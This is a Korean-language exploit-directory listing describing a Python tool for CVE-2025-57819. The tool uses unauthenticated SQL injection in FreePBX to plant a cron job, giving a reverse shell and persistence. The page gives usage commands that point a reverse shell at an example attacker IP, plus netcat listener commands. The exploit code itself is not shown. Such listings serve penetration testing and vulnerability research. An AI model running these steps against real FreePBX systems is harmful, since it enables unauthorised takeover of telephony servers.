Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-57819-exploit — Python exploit for CVE-2025-57819 targeting FreePBX via unauthenticated SQL injection to achieve remote code execution with automatic reverse shell and cron-based persistence. | Kitploit
도구/GitHubGitHub/its1zero/cve-2025-57819-exploit
Persistence MechanismsVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubits1zero/cve-2025-57819-exploit

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

cve-2025-57819-exploit

Python exploit for CVE-2025-57819 targeting FreePBX via unauthenticated SQL injection to achieve remote code execution with automatic reverse shell and cron-based persistence.

저장소 보기
1개월 전아직 검토되지 않음

CVE-2025-57819 익스플로잇

메타데이터

  • 심각도: 치명적 (9.8)
  • 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 유형: 인증되지 않은 SQL 인젝션 → 원격 코드 실행
  • 영향받는 소프트웨어: FreePBX (endpoint 모듈) < 15.0.66, < 16.0.89 및 < 17.0.3
  • 테스트 환경: CentOS 7 + Apache 2.4의 FreePBX 16.0.40.7

개요

이 스크립트는 취약한 FreePBX endpoint 모듈의 CVE-2025-57819를 익스플로잇합니다. 이 취약점은 SQL 인젝션을 허용하며, 이를 이용해 악성 cron 작업을 주입합니다.

다른 공개 익스플로잇처럼 업로드된 웹쉘과 대화형 상호작용을 위한 추가 단계는 필요하지 않습니다. 간단한 접근 방식으로, 직접 리버스 쉘에 접근할 수 있습니다.

영향

SQL 인젝션과 cron 작업 조작을 통해 원격 코드 실행이 이루어집니다. 성공적인 익스플로잇은 대상 시스템에서 리버스 쉘을 획득합니다. 구성에 따라 전체 시스템이 손상될 수 있습니다.

기능

  • 취약한 AJAX 엔드포인트를 통한 SQL 인젝션
  • 자동 리버스 쉘 페이로드 생성
  • 매분 실행(* * * * *)을 통한 cron 작업 지속성
  • 주입된 cron 작업 자동 정리
  • base64 페이로드는 + 문자가 공백으로 해석되어 손상되므로, 16진수 인코딩된 페이로드를 사용합니다.

사용법

대상 및 리스너 구성을 제공하여 익스플로잇을 실행합니다:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

매개변수

  • <target>: 대상 호스트명 또는 IP 주소 (취약한 FreePBX 인스턴스)
  • <lhost>: 리버스 쉘 콜백을 위한 공격자 IP 주소
  • <lport>: 수신 연결을 위한 리스닝 포트

예시:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

리스너 설정

익스플로잇 실행 전에 리스너를 시작하세요:

root@kitploit:~
nc -lvnp <port>

예시:

root@kitploit:~
nc -nlvp 9999

면책 조항

이 도구는 교육 목적 및 승인된 보안 테스트 전용입니다. 명시적인 허가 없이 시스템에 무단으로 사용하는 것은 불법입니다. 작성자는 이 도구의 오용이나 피해에 대해 책임을 지지 않습니다.

저자

Its1Zero - [email protected]

참고 자료

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
도구 다운로드